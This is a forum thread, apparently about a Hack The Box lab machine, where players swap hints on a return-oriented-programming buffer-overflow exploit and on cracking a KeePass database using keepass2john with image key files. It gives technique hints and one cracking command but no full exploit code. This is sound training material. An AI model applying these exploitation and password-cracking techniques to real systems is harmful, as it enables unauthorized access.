It seems the address for the string I’d like to use for sm call to get a shell keeps changing (inside of lbc). Any tips on how to access that string during runtime? I can access the upe and execute it fine, since that addr doesn’t change, just the strings in l*bc keep moving around.
Don’t try to guess the position of a string in a library the version of which you can’t even know (and hence also not where you find the string in it).
That actually makes a lot of sense, now that you say it, LOL. I did give up on that path. I was able to get what I need into another place (R9) but now trying to figure out how to get that into the s****m call. Of course, I also can put it all over the stack, but not sure how to get a pointer to one of those spots into RDI.
That actually makes a lot of sense, now that you say it, LOL. I did give up on that path. I was able to get what I need into another place (R9) but now trying to figure out how to get that into the s****m call. Of course, I also can put it all over the stack, but not sure how to get a pointer to one of those spots into RDI.
Is that more on the right track?
Even though I don’t know where you got something into R9 (I took a different approach, apparently), and even though I don’t find a way to get it back out of there, I dare say the general idea is good.
Also, it might be a good idea to actually take a look at the disassembled code instead of just relying on tools to find gadgets.
You can of course also PM me if you don’t want to spam the boards.
I have did some enum en discovered the version of web server en also some stuff on a higher port. I have seen a lot of post here about some binary input but I really don’t have any idea what and how
So please, can some one give me a nudge or send me a PM with some sites where i can read more about this technique?
can anyone help me with master password for kee**** . i tried bruteforcing for hours but i didn’t get anything. please help me
When you extract the hash don’t forget the 6 files you have to add them, then the master key will be obtained quickly.
I only included one of the picture as the key file, is it the correct way?
Each picture when extract with KP gave you a different hash.
the kp*$$2jo*n tool with switch -k would only allow one key file
or I should include all the picture file with the -k switch?
e.g. kp*$$2jo*n -k 1.jpg 2.jpg 3.jpg MyP@sswd.kx
the kp*$$2jo*n tool with switch -k would only allow one key file
or I should include all the picture file with the -k switch?
e.g. kp*$$2jo*n -k 1.jpg 2.jpg 3.jpg MyP@sswd.kx
Who said it is one line of command? maybe each picture needs to be run separately!
The binary here is actually a pretty good example of why you shouldn’t always rely on automated tools because they (usually) only think of one way to exploit a binary and might miss more “creative” ways. And it’s short enough that you can actually read the whole disassembly without getting bored.
Disassemble the code and take a look at the disassembly. A good disassembler will tell you what functions get called from what places and also what functions don’t get called.
Got everything; authenticating as root gives me authentication failure; can someone help?
Hi
Like access point, got the password and an interactive shell, but got authentication failure.
Can someone DM me for hint?
Edit: rooted!, error of copy paste!
user: it was fun to develop exploit using the pwn python lib. Learned a lot!
root: I don’t understand why i couldn’t find the .kx thing using hact. But it worked right away using the other option. I even trimmed the part of the format ha**ct didn’t like as per several articles on the internet but i just didn’t work. Anyone got the pss using ha**c*t ?
The box is cool. BOF is always one of a kind until you solve the kind, then it becomes easy (thinking of creator :P). Root is quite straightforward. The only hint I can provide for user is don’t try to leak something which is already there. Find a way to make it your butler and accept your commands.
I have developed a buffer overf. exploit that works locally, but I cannot get it to work on the remote system. I am using the address of /bin/s* that I found with gdb. I am guessing the address is not the same on the remote machine? Based on other hints it seems that we need to provide in our input what needs to be executed by sy***m, but I am not sure how to go about that.
So I’ve successfully created a R*P attack to get user, and have the Root Password. But it doesn’t let me use it to ssh into root. Am I going about this wrong?
Edit: Got it.
User:
Go through the very useful Ellingson writeup (Hack The Box - Ellingson - 0xRick’s Blog) and use it as a guide. This R*P is easier, but tricky because the string you want to exist doesn’t. Figuring out how to write to memory is hard.
Root:
Jn with k*s2jn was the way. Don’t forget the IMGs. SSH isn’t the only way up.
Thought this is an easy box…
Anyway, I’m completely new to binary exploitation (‘how to use gdb?’ level kind of new…)
and having hard time to even run the app in gdb.
Hitting ‘r’ or ‘run’ returns “Warning: not running” msg and no interaction at all. Is it me or my setup have no clue at all.
Thought this is an easy box…
Anyway, I’m completely new to binary exploitation (‘how to use gdb?’ level kind of new…)
and having hard time to even run the app in gdb.
Hitting ‘r’ or ‘run’ returns “Warning: not running” msg and no interaction at all. Is it me or my setup have no clue at all.
It’s easy, if you have a background in reverse engineering. Reveng the binary, take a look at the code and it’s immediately obvious what you have to do. If, and only if, you know your assembly. Otherwise, it’s a nightmare. The usual ROP tools fail to work or only tell you half the story needed for the binary, it’s not exactly a standard “pop the rdi and return to the syscall” ROP chain. Not too terrible, but IMO at least above the paygrade of a box suitable to a beginner of reversing.
The root part on the other hand is trivial and mostly “use the right tools and go get a coffee”.
Hi,
I have issue that i can’t leak libc addres via remote port to gain shell. Localy all works, but on remote I can’t get output after payload or bof is sent.
PM if someone can solve it.